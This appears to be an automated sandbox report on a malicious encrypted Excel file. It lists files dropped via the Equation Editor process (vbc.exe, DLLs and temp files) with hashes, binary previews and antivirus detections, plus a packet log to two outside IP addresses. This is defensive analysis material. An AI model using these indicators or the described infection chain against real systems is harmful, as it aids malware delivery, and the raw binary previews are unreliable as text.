                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6617CE4.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653280
                                                                                                                                                                                                        Entropy (8bit):2.8986377906498118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:634UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:04UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                        MD5:A49BEB715E475DD3C32F25ED71346D54
                                                                                                                                                                                                        SHA1:1A455F9E7C1D969A119EE77FEEA4904D62C217BE
                                                                                                                                                                                                        SHA-256:58965E7DDEF9329510DD2E62A3DE60DEB484C897A0152EDF311E6FA01347D599
                                                                                                                                                                                                        SHA-512:8AB6D1FCF71C415245F3608C071A05063D3F7FC87BC378D98DCE9F6EA71ECD334FE60BC77BA358F3E1913B90F70D52E8973B9D90934C07316134285A0F1A20E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N.WP...H...........4....N.WP...H... ....y.RH...P... ............z.R............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...|....2.Q.................{.Q............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgE449.tmp
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):191404
                                                                                                                                                                                                        Entropy (8bit):7.878606044995474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:2ojw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAWXNt:2ogstrYBJ9Dy3SFSxuPmWrt
                                                                                                                                                                                                        MD5:4FECDED6A29355A90A3D3B3AABBB16E4
                                                                                                                                                                                                        SHA1:F0F16D89E8D1DD35F088CB49298DEA74A3FFF53B
                                                                                                                                                                                                        SHA-256:29680AD46B1D8A090A403798300D02897B547CF3F87FE44ADA08D95C7D34406B
                                                                                                                                                                                                        SHA-512:03889A1FA29D924FD5EB1C293A8D62FAF78876EC5CCF90F7602DC92302DB1D06BC162BDE097A66E9D148C90D0B7920E539CED3D0EF3A9AB4DD230AA73DE7EC7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: lpdKSOB78u.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: jTmBvrBw7V.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: quote.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Order83930.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: GPP.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tjqth.zz
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):164352
                                                                                                                                                                                                        Entropy (8bit):7.998867839876064
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ajw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAW2:agstrYBJ9Dy3SFSxuPmWo
                                                                                                                                                                                                        MD5:D0AA54167E81FD8C6C7CBC832E178855
                                                                                                                                                                                                        SHA1:7DEB6EB916CCDB8BDF62214F2F3026E9758CBCF6
                                                                                                                                                                                                        SHA-256:C8FD43535A87747A5046D1096717E18CE1E67D1B428498C072F011F3FA9A21E0
                                                                                                                                                                                                        SHA-512:380D39FA1D20BA78F13F91B3B5EA16B058BC864019C8608898941B723E9B04DFEAADDFAF041DC0D888388E056CA188978AEB3797A2C243313772AD83EB7FCFB7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: .......Z...~....m...r...~.k.O...Sq....T.E..X.zT..y.*r.{.....s2=...t7^...a.?Gb.4k.).l4e.d.........X.?AO..*.[....].}....0..........j~v...Q.D!A.wA......W.C..@{y...s.#z}.......\x..#4..i.=)dO......#^$..s.._..G{.....8s(...q[..>.D.\U..W....{....6s.?i.:?.{.f.(.|......]..3...^(tS...+..o.N..Kn].,.. %.`.....M^.CRlj3.{.[..i.\-.....l.....+.:YD.....v.c.~[.....~...z.F._a.i/.g\.uF.l..G.D=......:...;...+.F..C...33.R3.[j=...%..G.a{P....KWu....L{...Zr.....6IE<..E&....H..j..;R......K...^}.....CO..v...'ov!..f$j....A...Uh.y.......8'...$.....'aSS.k57.(..}I...U......wL. ...-;....A..qXZ....)*8x.V...1...s....PM.(&j.w..a.R..Rx..<;e2.... ......K..V..c5.lD.eT.n../b..7P..S..I....K~.....K....I..._.p...,:.H.1...4.4.!...6.......?.x...N.*.;.....8..;.Op.u..]...\..B..4J....`.t".BEm.`\..2....;..C.).uV7...m...c...x9W.m#..T....@A2M..(..$S......l$b.8..........4'#..OM.%...\..F.d...|..v.`../x.......#.3.l....1XB.[s..>..g.bz....c.Ax.I.q;O..'. P.n.y..0...c...w9..'\....".s.....1
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):6.6898431043201
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:NEBgIVyWyVDSLUpyceXGkLF6HSFLdtyfJHxPVAcnuvmMeT8XfWJ1QhulooeUZi+w:qBnADSLwgXG7yFDixPVmxP4QPCrvLs3
                                                                                                                                                                                                        MD5:94A51F0839DE3A6F5069F766E7BDE4A7
                                                                                                                                                                                                        SHA1:19454F40631ACE4B3DE692C245E3F2551A6794D6
                                                                                                                                                                                                        SHA-256:2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
                                                                                                                                                                                                        SHA-512:07468053EFD63FC4B404D87722E0E282B1C5C487CF97E6D858771B67B2574C90D62341FD96D3CFB94ACA6ED357E40657842ADD01E7C563AE170A65450A4EB75A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L...F.4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........|............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...|...........................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                                                                        Entropy (8bit):7.99670962439914
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                        File name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        File size:2421248
                                                                                                                                                                                                        MD5:1b862193e621b4d67be94a2ec44fbf50
                                                                                                                                                                                                        SHA1:0bab9195da974524c969404430f6a58b31303322
                                                                                                                                                                                                        SHA256:709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
                                                                                                                                                                                                        SHA512:ba8833f1b0865cfe8c86b4eaa38c2b714152483703df8be21b7ecbe889480a0498c6d875bbcb28ba24c2898b13aa439849dddbf95cb8dc5dcdca75e3e69ca540
                                                                                                                                                                                                        SSDEEP:49152:YlbvU6wGnyG31TrBVcx6+mpF14GIlyXPs5OzOy7i0llTl8Z4JeZWo:YZvpwGnyGlTrBVcxMpF1TIyPsEzON0lm
                                                                                                                                                                                                        File Content Preview:........................>...................%...........................................................................................~...............z.......|.......~...............z.......|.......~...............z......................................

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                        Static OLE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                                                        OLE File "QTN3C2AF414EDF9_041873.xlsx"

                                                                                                                                                                                                        Indicators

                                                                                                                                                                                                        Has Summary Info:False
                                                                                                                                                                                                        Application Name:unknown
                                                                                                                                                                                                        Encrypted Document:True
                                                                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                                                                        Streams

                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:64
                                                                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:112
                                                                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:200
                                                                                                                                                                                                        Entropy:3.13335930328
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:76
                                                                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 2398680
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:2398680
                                                                                                                                                                                                        Entropy:7.99993012299
                                                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                                                        Data ASCII:. . $ . . . . . . 2 . . q ( . . . . 1 . f . x . ^ . . . . . . . . & . . . . . . . + . . . . . ) . . . 5 J . . . . . . . . . . 4 J . . . . c . ~ . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . .
                                                                                                                                                                                                        Data Raw:c8 99 24 00 00 00 00 00 8a 32 ec b2 71 28 0f 8d d9 d5 31 f1 66 00 78 fa 5e aa c9 c2 a1 c6 bc ea b4 26 09 be e7 d8 9b ba 9f 2b c6 f7 fb 14 f0 29 a0 93 1b 35 4a af 02 e9 cb e9 8e d5 0c 09 d5 34 4a 0a 17 1e a7 63 df 7e 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5
                                                                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:224
                                                                                                                                                                                                        Entropy:4.51185762188
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . h - K . . . > % . B ] . . , . 4 . . . | . . . . . X . . . . . . . . . @ . . . $ . " * . f . . l . . . / . . k . . . . P . . . . F .
                                                                                                                                                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.425698042 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626029015 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626152992 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626580000 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840116024 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840220928 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840297937 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.944238901 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.041582108 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166332960 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166465998 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166852951 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389307976 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389350891 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389374971 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389398098 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389426947 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389426947 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389431000 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389470100 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611238003 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611298084 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611337900 CET8049168103.140.251.164192.168.2.22
